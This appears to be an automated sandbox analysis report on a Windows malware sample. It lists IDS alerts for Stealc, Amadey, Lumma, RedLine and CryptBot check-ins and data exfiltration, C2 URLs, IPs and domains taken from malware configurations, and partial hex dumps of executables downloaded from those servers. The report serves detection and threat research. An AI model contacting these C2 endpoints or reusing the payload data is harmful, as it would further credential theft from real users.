Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.10:50025 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.10:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.10:50030 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.10:50035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.10:50036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.10:50039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.10:50041 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1892351376.000000007004D000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: freebl3.pdb source: freebl3.dll.9.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.9.dr
Source:	Binary string: nss3.pdb@ source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1892112569.000000006CD1F000.00000002.00000001.01000000.0000000D.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
Source:	Binary string: nss3.pdb source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1892112569.000000006CD1F000.00000002.00000001.01000000.0000000D.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: mozglue.pdb source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1892351376.000000007004D000.00000002.00000001.01000000.0000000E.sdmp

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 31MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.10:49852 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.10:49852 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.115:80 -> 192.168.2.10:49852
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.10:49852 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.115:80 -> 192.168.2.10:49852
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.10:49852 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.10:50017 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.10:50018
Source: Network traffic	Suricata IDS: 2059149 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rampnatleadk .click) : 192.168.2.10:60622 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.10:50027 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.10:50025 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:50026 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:50021 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.10:50030 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.10:50039 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.10:50041 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.10:50038 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.10:50038 -> 103.84.89.222:33791
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.10:50035 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:50032 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2059018 - Severity 1 - ET MALWARE CryptBot CnC Checkin : 192.168.2.10:50024 -> 94.156.102.240:80
Source: Network traffic	Suricata IDS: 2059150 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rampnatleadk .click in TLS SNI) : 192.168.2.10:50036 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 103.84.89.222:33791 -> 192.168.2.10:50038
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49704 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49704 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49705 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49705 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49707 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49791 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:50025 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:50025 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:50027 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:50027 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:50035 -> 104.21.79.9:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.215.113.115/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: https://rampnatleadk.click/api
Source: Malware configuration extractor	IPs: 185.215.113.43
Source: Malware configuration extractor	URLs: home.fivegg5th.top
Source: Malware configuration extractor	URLs: .1.1home.fivegg5th.top
Source: Malware configuration extractor	URLs: a.dnspod.comh.top
Source: Malware configuration extractor	URLs: gPhome.fivegg5th.top
Source: Malware configuration extractor	URLs: 103.84.89.222:33791

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 50038

Source: global traffic

TCP traffic: 192.168.2.10:50038 -> 103.84.89.222:33791

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 02 Feb 2025 06:55:48 GMTContent-Type: application/octet-streamContent-Length: 1772544Last-Modified: Sun, 02 Feb 2025 06:13:25 GMTConnection: keep-aliveETag: "679f0d05-1b0c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 f0 67 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 68 00 00 04 00 00 68 ac 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 75 6e 6a 6b 75 66 6c 00 70 19 00 00 70 4e 00 00 66 19 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 63 62 75 64 61 64 68 00 10 00 00 00 e0 67 00 00 04 00 00 00 e6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 67 00 00 22 00 00 00 ea 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 02 Feb 2025 06:55:51 GMTContent-Type: application/octet-streamContent-Length: 2962432Last-Modified: Sun, 02 Feb 2025 06:13:36 GMTConnection: keep-aliveETag: "679f0d10-2d3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 30 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 31 00 00 04 00 00 2f 40 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c c6 30 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec c5 30 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 70 77 64 68 6e 61 67 72 00 20 2a 00 00 b0 06 00 00 1a 2a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6f 6b 66 66 6b 67 6f 00 10 00 00 00 d0 30 00 00 04 00 00 00 0e 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 30 00 00 22 00 00 00 12 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Feb 2025 06:56:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Feb 2025 06:56:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Feb 2025 06:56:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 